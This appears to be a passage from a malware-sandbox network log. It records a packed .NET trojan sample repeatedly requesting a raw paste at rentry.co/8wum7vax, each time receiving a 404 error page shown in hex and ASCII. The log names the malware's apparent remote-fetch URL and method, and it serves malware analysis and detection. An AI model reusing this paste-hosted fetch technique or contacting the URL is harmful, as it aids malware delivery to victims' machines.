                                                                                        2024-10-18 10:42:00 UTC688INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:42:00 UTC1369INData Raw: 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64
                                                                                        Data Ascii: ons/512.png" /> <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and ed
                                                                                        2024-10-18 10:42:00 UTC1369INData Raw: 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69
                                                                                        Data Ascii: try.org' || 'rentry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container contai
                                                                                        2024-10-18 10:42:00 UTC1034INData Raw: 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 62 34 61 63 66 62 65 65 62 30 32 27 2c
                                                                                        Data Ascii: ipt src="/static/js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47eb4acfbeeb02',
                                                                                        2024-10-18 10:42:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.660615104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:42:02 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:42:03 UTC677INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:42:03 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        vary: accept-encoding
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LXLXd%2BYIJsxr7t4S35Ct7z712kxN7ndF7b5eApgYNI6AHoLNKJmkCM%2FuL5YvhCGWCHRw6gnbOOKRi51cB1t6QmZGWeAeBVkSJT1oBs6I2QcN69MJFeUeD6Es6g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47eb6099676c80-DFW
                                                                                        2024-10-18 10:42:03 UTC692INData Raw: 31 31 36 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1163<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:42:03 UTC1369INData Raw: 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e
                                                                                        Data Ascii: 512.png" /> <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editin
                                                                                        2024-10-18 10:42:03 UTC1369INData Raw: 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d
                                                                                        Data Ascii: org' || 'rentry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-
                                                                                        2024-10-18 10:42:03 UTC1029INData Raw: 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 62 36 30 39 39 36 37 36 63 38 30 27 2c 74 3a 27 4d
                                                                                        Data Ascii: src="/static/js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47eb6099676c80',t:'M
                                                                                        2024-10-18 10:42:03 UTC6INData Raw: 31 0d 0a 0a 0d 0a
                                                                                        Data Ascii: 1
                                                                                        2024-10-18 10:42:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.660616104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:42:05 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:42:06 UTC689INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:42:06 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        vary: accept-encoding
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MOJYIfTv1tSv2rU%2FFkkEOCcnkccwGw%2FomGQTAgH8sOiGZt%2B%2FZnyA%2Bnxh%2BHknNvFSXeFbaKd8jKjxYv1edWcpFd4tiVGGDqOBG6UuMpP%2B2%2B3xSv1BPU0my3UEeA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47eb72d8e24778-DFW
                                                                                        2024-10-18 10:42:06 UTC680INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:42:06 UTC1369INData Raw: 74 61 74 69 63 2f 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c
                                                                                        Data Ascii: tatic/icons/512.png" /> <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom url
                                                                                        2024-10-18 10:42:06 UTC1369INData Raw: 20 26 26 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65
                                                                                        Data Ascii: && 'rentry.org' || 'rentry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="containe
                                                                                        2024-10-18 10:42:06 UTC1042INData Raw: 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 62 37 32 64 38
                                                                                        Data Ascii: <script src="/static/js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47eb72d8
                                                                                        2024-10-18 10:42:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.660619104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:42:08 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:42:09 UTC656INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:42:09 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WZPYypkiC54Em1B8o0wMKiMzjO9pC33fWPw61JRxgaNI%2Fi5InfkZ0F89IYAKyZVo%2Fh8RNo5upSOyOvBJ9zLsEVTQ1YrxZrLjw9N6U12lPNT%2BGKxxtldetM6VZA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47eb852a526b1f-DFW
                                                                                        2024-10-18 10:42:09 UTC713INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:42:09 UTC1369INData Raw: 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70
                                                                                        Data Ascii: a property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta prop
                                                                                        2024-10-18 10:42:09 UTC1369INData Raw: 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:42:09 UTC1009INData Raw: 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 62 38 35 32 61 35 32 36 62 31 66 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 45 79 4f 53 34 77 4d 44 41 77 4d 44
                                                                                        Data Ascii: trap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47eb852a526b1f',t:'MTcyOTI0ODEyOS4wMDAwMD
                                                                                        2024-10-18 10:42:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        8192.168.2.660621104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:42:11 UTC47OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        2024-10-18 10:42:12 UTC675INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:42:11 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        vary: accept-encoding
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7dzmHf5YA0hiDkAj1GAm5fYktTX4WVcbYS90fsl3jP5c6SuDiip7pWT4IRQFlUofho7lwwLFub84If4IDg4n4JUA1jqI8qTWf%2Faj4l4Jg28Ouj8Q7ygPss7BCg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47eb97bef1e803-DFW
